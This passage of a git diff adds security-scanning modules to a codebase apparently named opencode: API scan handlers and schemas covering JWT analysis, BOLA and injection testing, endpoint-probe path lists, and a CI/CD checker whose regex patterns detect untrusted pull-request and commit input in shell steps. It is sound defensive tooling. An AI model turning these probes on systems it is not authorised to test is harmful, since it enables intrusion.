+  if (spec.endpoints.length > limit) {
+    lines.push(`... and ${spec.endpoints.length - limit} more`)
+  }
+
+  return {
+    title: `${spec.endpoints.length} endpoint(s) from spec`,
+    output: lines.join("\n"),
+    metadata: { action: "endpoints", specId: params.specId, count: spec.endpoints.length, status: "completed" },
+  }
+}
+
+/**
+ * Handle jwt-analyze action.
+ */
+function handleJwtAnalyze(params: {
+  token?: string
+}): { title: string; output: string; metadata: Record<string, unknown> } {
+  if (!params.token) {
+    return {
+      title: "JWT analyze requires token",
+      output: "Please provide a JWT token to analyze.",
+      metadata: { action: "jwt-analyze", status: "error" },
+    }
+  }
+
+  // Remove Bearer prefix if present
+  const token = params.token.replace(/^Bearer\s+/i, "")
+
+  try {
+    const analysis = JwtAnalyzer.analyze(token)
+
+    return {
+      title: `JWT analyzed: ${analysis.issues.length} issue(s)`,
+      output: JwtAnalyzer.format(analysis),
+      metadata: {
+        action: "jwt-analyze",
+        algorithm: analysis.algorithm,
+        isExpired: analysis.isExpired,
+        issueCount: analysis.issues.length,
+        attackVectorCount: analysis.attackVectors.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "JWT analysis failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "jwt-analyze", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle status action.
+ */
+async function handleStatus(params: {
+  scanID?: string
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.scanID) {
+    return {
+      title: "Status requires scanID",
+      output: "Please provide a scan ID.",
+      metadata: { action: "status", status: "error" },
+    }
+  }
+
+  const scan = await ApiScanStorage.getScan(params.scanID)
+  if (!scan) {
+    return {
+      title: "Scan not found",
+      output: `No scan with ID: ${params.scanID}`,
+      metadata: { action: "status", scanID: params.scanID, status: "error" },
+    }
+  }
+
+  const lines: string[] = []
+  lines.push(`Scan: ${params.scanID}`)
+  lines.push(`Target: ${scan.target}`)
+  lines.push(`Profile: ${scan.profile}`)
+  lines.push(`Status: ${scan.status}`)
+  lines.push(`Duration: ${(scan.stats.duration / 1000).toFixed(1)}s`)
+  lines.push(`Endpoints: ${scan.stats.endpointsScanned}/${scan.stats.endpointsDiscovered}`)
+  lines.push(`Findings: ${scan.stats.findingsCount}`)
+
+  return {
+    title: `Scan status: ${scan.status}`,
+    output: lines.join("\n"),
+    metadata: {
+      action: "status",
+      scanID: params.scanID,
+      scanStatus: scan.status,
+      findingsCount: scan.stats.findingsCount,
+      status: "completed",
+    },
+  }
+}
+
+/**
+ * Handle owasp-api action.
+ */
+async function handleOwaspApi(params: {
+  scanID?: string
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.scanID) {
+    return {
+      title: "OWASP-API requires scanID",
+      output: "Please provide a scan ID to categorize findings.",
+      metadata: { action: "owasp-api", status: "error" },
+    }
+  }
+
+  const scan = await ApiScanStorage.getScan(params.scanID)
+  if (!scan) {
+    return {
+      title: "Scan not found",
+      output: `No scan with ID: ${params.scanID}`,
+      metadata: { action: "owasp-api", scanID: params.scanID, status: "error" },
+    }
+  }
+
+  // Simple categorization based on finding types
+  const categories: Record<string, number> = {
+    "API1:2023-Broken_Object_Level_Authorization": 0,
+    "API2:2023-Broken_Authentication": 0,
+    "API3:2023-Broken_Object_Property_Level_Authorization": 0,
+    "API4:2023-Unrestricted_Resource_Consumption": 0,
+    "API5:2023-Broken_Function_Level_Authorization": 0,
+    "API6:2023-Unrestricted_Access_to_Sensitive_Business_Flows": 0,
+    "API7:2023-Server_Side_Request_Forgery": 0,
+    "API8:2023-Security_Misconfiguration": 0,
+    "API9:2023-Improper_Inventory_Management": 0,
+    "API10:2023-Unsafe_Consumption_of_APIs": 0,
+  }
+
+  // Count based on test results
+  if (scan.bolaResults) {
+    categories["API1:2023-Broken_Object_Level_Authorization"] = scan.bolaResults.filter((r) => r.vulnerable).length
+  }
+  if (scan.jwtAnalysis?.issues.length) {
+    categories["API2:2023-Broken_Authentication"] = scan.jwtAnalysis.issues.length
+  }
+  if (scan.injectionResults) {
+    // Injection would typically fall under API8 (misconfiguration allowing injection)
+    categories["API8:2023-Security_Misconfiguration"] = scan.injectionResults.filter((r) => r.vulnerable).length
+  }
+
+  const lines: string[] = []
+  lines.push(`OWASP API Top 10 2023 - Scan: ${params.scanID}`)
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  for (const [category, count] of Object.entries(categories)) {
+    if (count > 0) {
+      lines.push(`${category}: ${count} finding(s)`)
+    }
+  }
+
+  const totalCategorized = Object.values(categories).reduce((a, b) => a + b, 0)
+  if (totalCategorized === 0) {
+    lines.push("No findings to categorize.")
+  }
+
+  return {
+    title: `OWASP API categorization: ${totalCategorized} finding(s)`,
+    output: lines.join("\n"),
+    metadata: {
+      action: "owasp-api",
+      scanID: params.scanID,
+      categorizedCount: totalCategorized,
+      status: "completed",
+    },
+  }
+}
+
+/**
+ * Handle profiles action.
+ */
+function handleProfiles(): { title: string; output: string; metadata: Record<string, unknown> } {
+  const lines: string[] = []
+  lines.push("Available API Scan Profiles")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  for (const profile of ApiScanProfiles.list()) {
+    lines.push(`${profile.id}: ${profile.name}`)
+    lines.push(`  ${profile.description}`)
+    lines.push(`  Discovery: ${profile.discovery.enabled ? "Yes" : "No"}`)
+    lines.push(`  Auth Tests: ${profile.authTests.enabled ? "Yes" : "No"}`)
+    lines.push(`  Injection Tests: ${profile.injectionTests.enabled ? "Yes" : "No"}`)
+    lines.push(`  BOLA Tests: ${profile.bolaTests ? "Yes" : "No"}`)
+    lines.push("")
+  }
+
+  return {
+    title: "API scan profiles",
+    output: lines.join("\n"),
+    metadata: { action: "profiles", count: ApiScanProfiles.list().length, status: "completed" },
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/types.ts b/packages/opencode/src/pentest/apiscan/types.ts
new file mode 100644
index 00000000000..035c0429d28
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/types.ts
@@ -0,0 +1,504 @@
+/**
+ * @fileoverview API Security Scanner Types
+ *
+ * Zod schemas for API scanning data structures including:
+ * - API endpoint definitions
+ * - OpenAPI/GraphQL specifications
+ * - Authentication configurations
+ * - JWT analysis
+ * - Scan profiles and results
+ * - OWASP API Top 10 2023 categorization
+ *
+ * @module pentest/apiscan/types
+ */
+
+import z from "zod"
+
+export namespace ApiScanTypes {
+  /**
+   * HTTP methods
+   */
+  export const HttpMethod = z.enum(["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"])
+  export type HttpMethod = z.infer<typeof HttpMethod>
+
+  /**
+   * Scan/discovery status
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * API specification type
+   */
+  export const SpecType = z.enum(["openapi", "graphql", "manual"])
+  export type SpecType = z.infer<typeof SpecType>
+
+  /**
+   * Parameter location in API request
+   */
+  export const ParameterLocation = z.enum(["path", "query", "header", "cookie", "body"])
+  export type ParameterLocation = z.infer<typeof ParameterLocation>
+
+  /**
+   * Parameter data type
+   */
+  export const ParameterType = z.enum(["string", "number", "integer", "boolean", "array", "object"])
+  export type ParameterType = z.infer<typeof ParameterType>
+
+  /**
+   * API parameter definition
+   */
+  export const ApiParameter = z.object({
+    name: z.string(),
+    in: ParameterLocation,
+    type: ParameterType.default("string"),
+    required: z.boolean().default(false),
+    description: z.string().optional(),
+    example: z.unknown().optional(),
+    schema: z.record(z.string(), z.unknown()).optional(),
+  })
+  export type ApiParameter = z.infer<typeof ApiParameter>
+
+  /**
+   * Request body definition
+   */
+  export const RequestBody = z.object({
+    contentType: z.string().default("application/json"),
+    required: z.boolean().default(false),
+    schema: z.record(z.string(), z.unknown()).optional(),
+    example: z.unknown().optional(),
+  })
+  export type RequestBody = z.infer<typeof RequestBody>
+
+  /**
+   * Response schema
+   */
+  export const ResponseSchema = z.object({
+    statusCode: z.number(),
+    description: z.string().optional(),
+    contentType: z.string().optional(),
+    schema: z.record(z.string(), z.unknown()).optional(),
+  })
+  export type ResponseSchema = z.infer<typeof ResponseSchema>
+
+  /**
+   * Security requirement
+   */
+  export const SecurityRequirement = z.object({
+    name: z.string(),
+    scopes: z.array(z.string()).optional(),
+  })
+  export type SecurityRequirement = z.infer<typeof SecurityRequirement>
+
+  /**
+   * Security scheme type
+   */
+  export const SecuritySchemeType = z.enum(["apiKey", "http", "oauth2", "openIdConnect"])
+  export type SecuritySchemeType = z.infer<typeof SecuritySchemeType>
+
+  /**
+   * Security scheme definition
+   */
+  export const SecurityScheme = z.object({
+    name: z.string(),
+    type: SecuritySchemeType,
+    description: z.string().optional(),
+    in: z.enum(["header", "query", "cookie"]).optional(),
+    scheme: z.string().optional(), // e.g., "bearer", "basic"
+    bearerFormat: z.string().optional(), // e.g., "JWT"
+    flows: z.record(z.string(), z.unknown()).optional(), // OAuth2 flows
+    openIdConnectUrl: z.string().optional(),
+  })
+  export type SecurityScheme = z.infer<typeof SecurityScheme>
+
+  /**
+   * API endpoint definition
+   */
+  export const ApiEndpoint = z.object({
+    id: z.string(),
+    path: z.string(),
+    method: HttpMethod,
+    summary: z.string().optional(),
+    description: z.string().optional(),
+    operationId: z.string().optional(),
+    parameters: z.array(ApiParameter).default([]),
+    requestBody: RequestBody.optional(),
+    responses: z.array(ResponseSchema).default([]),
+    security: z.array(SecurityRequirement).optional(),
+    tags: z.array(z.string()).optional(),
+    deprecated: z.boolean().optional(),
+  })
+  export type ApiEndpoint = z.infer<typeof ApiEndpoint>
+
+  /**
+   * GraphQL field definition
+   */
+  export const GraphQLField = z.object({
+    name: z.string(),
+    type: z.string(),
+    args: z
+      .array(
+        z.object({
+          name: z.string(),
+          type: z.string(),
+          defaultValue: z.unknown().optional(),
+        })
+      )
+      .optional(),
+    description: z.string().optional(),
+    deprecationReason: z.string().optional(),
+  })
+  export type GraphQLField = z.infer<typeof GraphQLField>
+
+  /**
+   * GraphQL type definition
+   */
+  export const GraphQLType = z.object({
+    name: z.string(),
+    kind: z.enum(["OBJECT", "INPUT_OBJECT", "ENUM", "SCALAR", "INTERFACE", "UNION"]),
+    fields: z.array(GraphQLField).optional(),
+    enumValues: z.array(z.string()).optional(),
+    description: z.string().optional(),
+  })
+  export type GraphQLType = z.infer<typeof GraphQLType>
+
+  /**
+   * GraphQL schema
+   */
+  export const GraphQLSchema = z.object({
+    queryType: z.string().optional(),
+    mutationType: z.string().optional(),
+    subscriptionType: z.string().optional(),
+    types: z.array(GraphQLType),
+    directives: z.array(z.string()).optional(),
+  })
+  export type GraphQLSchema = z.infer<typeof GraphQLSchema>
+
+  /**
+   * API specification
+   */
+  export const ApiSpec = z.object({
+    id: z.string(),
+    target: z.string(),
+    type: SpecType,
+    version: z.string().optional(),
+    title: z.string().optional(),
+    description: z.string().optional(),
+    endpoints: z.array(ApiEndpoint),
+    securitySchemes: z.array(SecurityScheme).default([]),
+    graphqlSchema: GraphQLSchema.optional(),
+    servers: z.array(z.string()).optional(),
+    discoveredAt: z.number(),
+  })
+  export type ApiSpec = z.infer<typeof ApiSpec>
+
+  /**
+   * Authentication type
+   */
+  export const AuthType = z.enum(["jwt", "apikey", "oauth", "basic", "bearer", "none"])
+  export type AuthType = z.infer<typeof AuthType>
+
+  /**
+   * API key configuration
+   */
+  export const ApiKeyConfig = z.object({
+    header: z.string().default("X-API-Key"),
+    value: z.string(),
+  })
+  export type ApiKeyConfig = z.infer<typeof ApiKeyConfig>
+
+  /**
+   * OAuth configuration
+   */
+  export const OAuthConfig = z.object({
+    clientId: z.string(),
+    clientSecret: z.string(),
+    tokenUrl: z.string(),
+    scopes: z.array(z.string()).optional(),
+    grantType: z.enum(["client_credentials", "password", "authorization_code"]).default("client_credentials"),
+  })
+  export type OAuthConfig = z.infer<typeof OAuthConfig>
+
+  /**
+   * Basic auth configuration
+   */
+  export const BasicAuthConfig = z.object({
+    username: z.string(),
+    password: z.string(),
+  })
+  export type BasicAuthConfig = z.infer<typeof BasicAuthConfig>
+
+  /**
+   * Authentication configuration
+   */
+  export const AuthConfig = z.object({
+    type: AuthType,
+    token: z.string().optional(),
+    apiKey: ApiKeyConfig.optional(),
+    oauth: OAuthConfig.optional(),
+    basic: BasicAuthConfig.optional(),
+  })
+  export type AuthConfig = z.infer<typeof AuthConfig>
+
+  /**
+   * JWT algorithm
+   */
+  export const JwtAlgorithm = z.enum([
+    "HS256",
+    "HS384",
+    "HS512",
+    "RS256",
+    "RS384",
+    "RS512",
+    "ES256",
+    "ES384",
+    "ES512",
+    "PS256",
+    "PS384",
+    "PS512",
+    "none",
+  ])
+  export type JwtAlgorithm = z.infer<typeof JwtAlgorithm>
+
+  /**
+   * JWT analysis result
+   */
+  export const JwtAnalysis = z.object({
+    raw: z.string(),
+    header: z.record(z.string(), z.unknown()),
+    payload: z.record(z.string(), z.unknown()),
+    signature: z.string(),
+    algorithm: z.string(),
+    isExpired: z.boolean(),
+    expiresAt: z.number().optional(),
+    issuedAt: z.number().optional(),
+    notBefore: z.number().optional(),
+    issuer: z.string().optional(),
+    subject: z.string().optional(),
+    audience: z.union([z.string(), z.array(z.string())]).optional(),
+    issues: z.array(z.string()),
+    attackVectors: z.array(z.string()),
+  })
+  export type JwtAnalysis = z.infer<typeof JwtAnalysis>
+
+  /**
+   * BOLA test result
+   */
+  export const BolaTestResult = z.object({
+    endpoint: z.string(),
+    method: HttpMethod,
+    originalId: z.string(),
+    testedIds: z.array(z.string()),
+    vulnerable: z.boolean(),
+    accessibleIds: z.array(z.string()),
+    responses: z.array(
+      z.object({
+        id: z.string(),
+        statusCode: z.number(),
+        accessible: z.boolean(),
+      })
+    ),
+  })
+  export type BolaTestResult = z.infer<typeof BolaTestResult>
+
+  /**
+   * Injection test type
+   */
+  export const InjectionType = z.enum(["sql", "nosql", "command", "ldap", "xpath"])
+  export type InjectionType = z.infer<typeof InjectionType>
+
+  /**
+   * Injection test result
+   */
+  export const InjectionTestResult = z.object({
+    endpoint: z.string(),
+    method: HttpMethod,
+    parameter: z.string(),
+    type: InjectionType,
+    vulnerable: z.boolean(),
+    payload: z.string().optional(),
+    evidence: z.string().optional(),
+    responseTime: z.number().optional(),
+  })
+  export type InjectionTestResult = z.infer<typeof InjectionTestResult>
+
+  /**
+   * Endpoint test result
+   */
+  export const EndpointTestResult = z.object({
+    endpointId: z.string(),
+    path: z.string(),
+    method: HttpMethod,
+    authRequired: z.boolean(),
+    authBypassed: z.boolean().optional(),
+    bolaVulnerable: z.boolean().optional(),
+    injectionVulnerable: z.boolean().optional(),
+    statusCode: z.number().optional(),
+    responseTime: z.number().optional(),
+    findings: z.array(z.string()),
+    testedAt: z.number(),
+  })
+  export type EndpointTestResult = z.infer<typeof EndpointTestResult>
+
+  /**
+   * Scan profile ID
+   */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "passive", "auth-focused", "custom"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Discovery configuration
+   */
+  export const DiscoveryConfig = z.object({
+    enabled: z.boolean(),
+    parseOpenApi: z.boolean().default(true),
+    parseGraphQL: z.boolean().default(true),
+    commonPaths: z.boolean().default(true),
+  })
+  export type DiscoveryConfig = z.infer<typeof DiscoveryConfig>
+
+  /**
+   * Auth test configuration
+   */
+  export const AuthTestConfig = z.object({
+    enabled: z.boolean(),
+    jwtAnalysis: z.boolean().default(true),
+    apiKeyTest: z.boolean().default(false),
+    oauthTest: z.boolean().default(false),
+    bruteForce: z.boolean().default(false),
+  })
+  export type AuthTestConfig = z.infer<typeof AuthTestConfig>
+
+  /**
+   * Injection test configuration
+   */
+  export const InjectionTestConfig = z.object({
+    enabled: z.boolean(),
+    sql: z.boolean().default(true),
+    nosql: z.boolean().default(true),
+    command: z.boolean().default(false),
+  })
+  export type InjectionTestConfig = z.infer<typeof InjectionTestConfig>
+
+  /**
+   * Scan profile definition
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    discovery: DiscoveryConfig,
+    authTests: AuthTestConfig,
+    injectionTests: InjectionTestConfig,
+    bolaTests: z.boolean().default(false),
+    rateLimit: z.number().optional(), // requests per second
+    timeout: z.number().default(30000),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  /**
+   * Scan statistics
+   */
+  export const ScanStats = z.object({
+    endpointsDiscovered: z.number(),
+    endpointsScanned: z.number(),
+    endpointsVulnerable: z.number(),
+    authTestsRun: z.number(),
+    injectionTestsRun: z.number(),
+    bolaTestsRun: z.number(),
+    findingsCount: z.number(),
+    criticalCount: z.number(),
+    highCount: z.number(),
+    mediumCount: z.number(),
+    lowCount: z.number(),
+    infoCount: z.number(),
+    duration: z.number(),
+  })
+  export type ScanStats = z.infer<typeof ScanStats>
+
+  /**
+   * API scan result
+   */
+  export const ApiScanResult = z.object({
+    id: z.string(),
+    target: z.string(),
+    specId: z.string().optional(),
+    profile: ProfileId,
+    auth: AuthConfig.optional(),
+    endpoints: z.array(EndpointTestResult),
+    jwtAnalysis: JwtAnalysis.optional(),
+    bolaResults: z.array(BolaTestResult).optional(),
+    injectionResults: z.array(InjectionTestResult).optional(),
+    findings: z.array(z.string()),
+    stats: ScanStats,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    status: Status,
+    error: z.string().optional(),
+  })
+  export type ApiScanResult = z.infer<typeof ApiScanResult>
+
+  /**
+   * OWASP API Top 10 2023 categories
+   */
+  export const OwaspApiCategory = z.enum([
+    "API1:2023-Broken_Object_Level_Authorization",
+    "API2:2023-Broken_Authentication",
+    "API3:2023-Broken_Object_Property_Level_Authorization",
+    "API4:2023-Unrestricted_Resource_Consumption",
+    "API5:2023-Broken_Function_Level_Authorization",
+    "API6:2023-Unrestricted_Access_to_Sensitive_Business_Flows",
+    "API7:2023-Server_Side_Request_Forgery",
+    "API8:2023-Security_Misconfiguration",
+    "API9:2023-Improper_Inventory_Management",
+    "API10:2023-Unsafe_Consumption_of_APIs",
+    "Uncategorized",
+  ])
+  export type OwaspApiCategory = z.infer<typeof OwaspApiCategory>
+
+  /**
+   * Categorized finding
+   */
+  export const CategorizedFinding = z.object({
+    findingID: z.string(),
+    category: OwaspApiCategory,
+    confidence: z.enum(["high", "medium", "low"]),
+    matchedPatterns: z.array(z.string()),
+  })
+  export type CategorizedFinding = z.infer<typeof CategorizedFinding>
+
+  /**
+   * OWASP API categorization result
+   */
+  export const OwaspApiCategorization = z.object({
+    scanID: z.string(),
+    findings: z.array(CategorizedFinding),
+    summary: z.record(OwaspApiCategory, z.number()),
+    generatedAt: z.number(),
+  })
+  export type OwaspApiCategorization = z.infer<typeof OwaspApiCategorization>
+
+  /**
+   * Common OpenAPI paths to probe
+   */
+  export const COMMON_API_PATHS = [
+    "/openapi.json",
+    "/openapi.yaml",
+    "/swagger.json",
+    "/swagger.yaml",
+    "/api-docs",
+    "/api-docs.json",
+    "/v1/openapi.json",
+    "/v2/openapi.json",
+    "/v3/openapi.json",
+    "/api/openapi.json",
+    "/api/swagger.json",
+    "/docs/openapi.json",
+    "/.well-known/openapi.json",
+  ] as const
+
+  /**
+   * Common GraphQL paths to probe
+   */
+  export const COMMON_GRAPHQL_PATHS = ["/graphql", "/graphiql", "/api/graphql", "/v1/graphql", "/query"] as const
+}
diff --git a/packages/opencode/src/pentest/cicd/checks/index.ts b/packages/opencode/src/pentest/cicd/checks/index.ts
new file mode 100644
index 00000000000..9214667c770
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/checks/index.ts
@@ -0,0 +1,179 @@
+/**
+ * @fileoverview CI/CD Security Checks Index
+ *
+ * Exports all CI/CD security check modules.
+ */
+
+export * from "./secrets"
+export * from "./permissions"
+export * from "./injection"
+export * from "./supply-chain"
+
+import { CICDTypes } from "../types"
+import { SecretsCheck } from "./secrets"
+import type { SecretDetectionOptions } from "./secrets"
+import { PermissionsCheck } from "./permissions"
+import type { PermissionAnalysisOptions } from "./permissions"
+import { InjectionCheck } from "./injection"
+import type { InjectionDetectionOptions } from "./injection"
+import { SupplyChainCheck } from "./supply-chain"
+import type { SupplyChainCheckOptions } from "./supply-chain"
+
+/** Combined check options */
+export interface CheckOptions {
+  secrets?: SecretDetectionOptions
+  permissions?: PermissionAnalysisOptions
+  injection?: InjectionDetectionOptions
+  supplyChain?: SupplyChainCheckOptions
+}
+
+/** Combined check result */
+export interface CheckResult {
+  findings: CICDTypes.CICDFinding[]
+  stats: {
+    secretsFound: number
+    permissionIssues: number
+    injectionVectors: number
+    supplyChainIssues: number
+    totalFindings: number
+  }
+}
+
+/**
+ * Run all security checks on a pipeline
+ */
+export function runAllChecks(
+  pipeline: CICDTypes.PipelineConfig,
+  options: CheckOptions = {}
+): CheckResult {
+  const findings: CICDTypes.CICDFinding[] = []
+  const stats = {
+    secretsFound: 0,
+    permissionIssues: 0,
+    injectionVectors: 0,
+    supplyChainIssues: 0,
+    totalFindings: 0,
+  }
+
+  // Run secret detection
+  const secretResult = SecretsCheck.detect(
+    pipeline.raw || "",
+    pipeline.path,
+    options.secrets
+  )
+  const secretFindings = SecretsCheck.toFindings(secretResult.findings, pipeline.name)
+  findings.push(...secretFindings)
+  stats.secretsFound = secretResult.secretsFound
+
+  // Run permission analysis
+  const permResult = PermissionsCheck.analyze(pipeline, options.permissions)
+  findings.push(...permResult.findings)
+  stats.permissionIssues = permResult.riskyPermissions
+
+  // Check trigger-permission combinations
+  const triggerPermFindings = PermissionsCheck.checkTriggerPermissionRisk(pipeline)
+  findings.push(...triggerPermFindings)
+  stats.permissionIssues += triggerPermFindings.length
+
+  // Run injection detection
+  const injectionResult = InjectionCheck.detect(pipeline, options.injection)
+  findings.push(...injectionResult.findings)
+  stats.injectionVectors = injectionResult.vectorsFound
+
+  // Check risky triggers
+  const riskyTriggerFindings = InjectionCheck.checkRiskyTriggers(pipeline)
+  findings.push(...riskyTriggerFindings)
+  stats.injectionVectors += riskyTriggerFindings.length
+
+  // Run supply chain checks
+  const supplyChainResult = SupplyChainCheck.check(pipeline, options.supplyChain)
+  findings.push(...supplyChainResult.findings)
+  stats.supplyChainIssues = supplyChainResult.unpinnedActions + supplyChainResult.untrustedActions
+
+  // Check OIDC configurations
+  const oidcFindings = SupplyChainCheck.checkOIDC(pipeline)
+  findings.push(...oidcFindings)
+  stats.supplyChainIssues += oidcFindings.length
+
+  stats.totalFindings = findings.length
+
+  // Deduplicate findings by ID
+  const uniqueFindings = Array.from(
+    new Map(findings.map((f) => [f.id, f])).values()
+  )
+
+  return {
+    findings: uniqueFindings,
+    stats,
+  }
+}
+
+/**
+ * Run specific checks based on profile configuration
+ */
+export function runChecks(
+  pipeline: CICDTypes.PipelineConfig,
+  checkConfig: CICDTypes.CheckConfig,
+  options: CheckOptions = {}
+): CheckResult {
+  const findings: CICDTypes.CICDFinding[] = []
+  const stats = {
+    secretsFound: 0,
+    permissionIssues: 0,
+    injectionVectors: 0,
+    supplyChainIssues: 0,
+    totalFindings: 0,
+  }
+
+  if (checkConfig.secrets) {
+    const secretResult = SecretsCheck.detect(
+      pipeline.raw || "",
+      pipeline.path,
+      options.secrets
+    )
+    const secretFindings = SecretsCheck.toFindings(secretResult.findings, pipeline.name)
+    findings.push(...secretFindings)
+    stats.secretsFound = secretResult.secretsFound
+  }
+
+  if (checkConfig.permissions) {
+    const permResult = PermissionsCheck.analyze(pipeline, options.permissions)
+    findings.push(...permResult.findings)
+    stats.permissionIssues = permResult.riskyPermissions
+
+    const triggerPermFindings = PermissionsCheck.checkTriggerPermissionRisk(pipeline)
+    findings.push(...triggerPermFindings)
+    stats.permissionIssues += triggerPermFindings.length
+  }
+
+  if (checkConfig.injection) {
+    const injectionResult = InjectionCheck.detect(pipeline, options.injection)
+    findings.push(...injectionResult.findings)
+    stats.injectionVectors = injectionResult.vectorsFound
+
+    const riskyTriggerFindings = InjectionCheck.checkRiskyTriggers(pipeline)
+    findings.push(...riskyTriggerFindings)
+    stats.injectionVectors += riskyTriggerFindings.length
+  }
+
+  if (checkConfig.supplyChain) {
+    const supplyChainResult = SupplyChainCheck.check(pipeline, options.supplyChain)
+    findings.push(...supplyChainResult.findings)
+    stats.supplyChainIssues = supplyChainResult.unpinnedActions + supplyChainResult.untrustedActions
+
+    const oidcFindings = SupplyChainCheck.checkOIDC(pipeline)
+    findings.push(...oidcFindings)
+    stats.supplyChainIssues += oidcFindings.length
+  }
+
+  stats.totalFindings = findings.length
+
+  const uniqueFindings = Array.from(
+    new Map(findings.map((f) => [f.id, f])).values()
+  )
+
+  return {
+    findings: uniqueFindings,
+    stats,
+  }
+}
diff --git a/packages/opencode/src/pentest/cicd/checks/injection.ts b/packages/opencode/src/pentest/cicd/checks/injection.ts
new file mode 100644
index 00000000000..ad566580b46
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/checks/injection.ts
@@ -0,0 +1,410 @@
+/**
+ * @fileoverview CI/CD Command Injection Detection
+ *
+ * Detects command injection vulnerabilities in CI/CD configurations,
+ * particularly from untrusted input sources like PR titles and commit messages.
+ */
+
+import { CICDTypes } from "../types"
+
+/** Injection detection options */
+export interface InjectionDetectionOptions {
+  /** Additional dangerous contexts to check */
+  customDangerousContexts?: string[]
+  /** Skip certain injection patterns */
+  skipPatterns?: string[]
+}
+
+/** Injection detection result */
+export interface InjectionDetectionResult {
+  findings: CICDTypes.CICDFinding[]
+  vectorsFound: number
+  affectedJobs: string[]
+}
+
+export namespace InjectionCheck {
+  /** GitHub expression patterns that reference untrusted input */
+  const GITHUB_DANGEROUS_EXPRESSIONS = CICDTypes.DANGEROUS_GITHUB_CONTEXTS.map(
+    (ctx) => new RegExp(`\\$\\{\\{\\s*${ctx.replace(/\./g, "\\.").replace(/\[\*\]/g, "\\[\\d+\\]")}\\s*\\}\\}`, "gi")
+  )
+
+  /** Patterns for direct command injection in run blocks */
+  const COMMAND_INJECTION_PATTERNS = [
+    // Direct interpolation in shell commands
+    { pattern: /run:\s*\|?\s*[^\n]*\$\{\{[^}]*github\.event\.(issue|pull_request|comment|review)\./, severity: "critical" as const },
+    { pattern: /run:\s*\|?\s*[^\n]*\$\{\{[^}]*github\.head_ref/, severity: "critical" as const },
+    { pattern: /run:\s*\|?\s*[^\n]*\$\{\{[^}]*github\.event\.head_commit\.message/, severity: "critical" as const },
+    // Backtick command substitution with dangerous input
+    { pattern: /`\$\{\{[^}]*github\.event\.(issue|pull_request|comment|review)\./, severity: "critical" as const },
+    // Shell variable expansion with dangerous input
+    { pattern: /\$\([^)]*\$\{\{[^}]*github\.event\./, severity: "critical" as const },
+  ]
+
+  /** GitLab CI dangerous variable patterns */
+  const GITLAB_DANGEROUS_PATTERNS = [
+    { pattern: /\$CI_MERGE_REQUEST_TITLE/, severity: "high" as const, context: "Merge request title" },
+    { pattern: /\$CI_MERGE_REQUEST_DESCRIPTION/, severity: "high" as const, context: "Merge request description" },
+    { pattern: /\$CI_COMMIT_MESSAGE/, severity: "high" as const, context: "Commit message" },
+    { pattern: /\$CI_COMMIT_TAG_MESSAGE/, severity: "medium" as const, context: "Tag message" },
+  ]
+
+  /** Jenkins dangerous parameter patterns */
+  const JENKINS_DANGEROUS_PATTERNS = [
+    { pattern: /\$\{params\.\w+\}/, severity: "high" as const, context: "Pipeline parameter" },
+    { pattern: /params\.\w+/, severity: "high" as const, context: "Pipeline parameter" },
+    { pattern: /\$\{env\.\w+\}/, severity: "medium" as const, context: "Environment variable" },
+  ]
+
+  /**
+   * Detect injection vulnerabilities in a pipeline
+   */
+  export function detect(
+    pipeline: CICDTypes.PipelineConfig,
+    options: InjectionDetectionOptions = {}
+  ): InjectionDetectionResult {
+    const findings: CICDTypes.CICDFinding[] = []
+    const affectedJobs = new Set<string>()
+
+    const content = pipeline.raw || ""
+
+    // Provider-specific detection
+    switch (pipeline.provider) {
+      case "github":
+        findings.push(...detectGitHubInjection(pipeline, content, options))
+        break
+      case "gitlab":
+        findings.push(...detectGitLabInjection(pipeline, content, options))
+        break
+      case "jenkins":
+        findings.push(...detectJenkinsInjection(pipeline, content, options))
+        break
+    }
+
+    // Track affected jobs
+    for (const finding of findings) {
+      if (finding.job) {
+        affectedJobs.add(finding.job)
+      }
+    }
+
+    return {
+      findings,
+      vectorsFound: findings.length,
+      affectedJobs: Array.from(affectedJobs),
+    }
+  }
+
+  /**
+   * Detect GitHub Actions injection vulnerabilities
+   */
+  function detectGitHubInjection(
+    pipeline: CICDTypes.PipelineConfig,
+    content: string,
+    options: InjectionDetectionOptions
+  ): CICDTypes.CICDFinding[] {
+    const findings: CICDTypes.CICDFinding[] = []
+    const lines = content.split("\n")
+
+    // Check each job and step
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (!step.command) continue
+
+        // Check for dangerous expressions in run commands
+        for (const pattern of COMMAND_INJECTION_PATTERNS) {
+          if (pattern.pattern.test(step.command)) {
+            findings.push({
+              id: generateFindingId(),
+              category: "injection",
+              severity: pattern.severity,
+              title: "Command Injection via Untrusted Input",
+              description: `Step '${step.name}' in job '${job.id}' directly interpolates untrusted input into a shell command. An attacker can craft a malicious PR title, body, or commit message to execute arbitrary commands.`,
+              file: pipeline.path,
+              line: step.line,
+              pipeline: pipeline.name,
+              job: job.id,
+              step: step.id,
+              evidence: step.command.slice(0, 200),
+              remediation: "Use an intermediate environment variable to sanitize input:\n\n```yaml\nenv:\n  TITLE: ${{ github.event.pull_request.title }}\nrun: echo \"$TITLE\"  # Quoted to prevent injection\n```",
+              references: [
+                "https://securitylab.github.com/research/github-actions-untrusted-input/",
+                "https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections",
+              ],
+              cwe: "CWE-78",
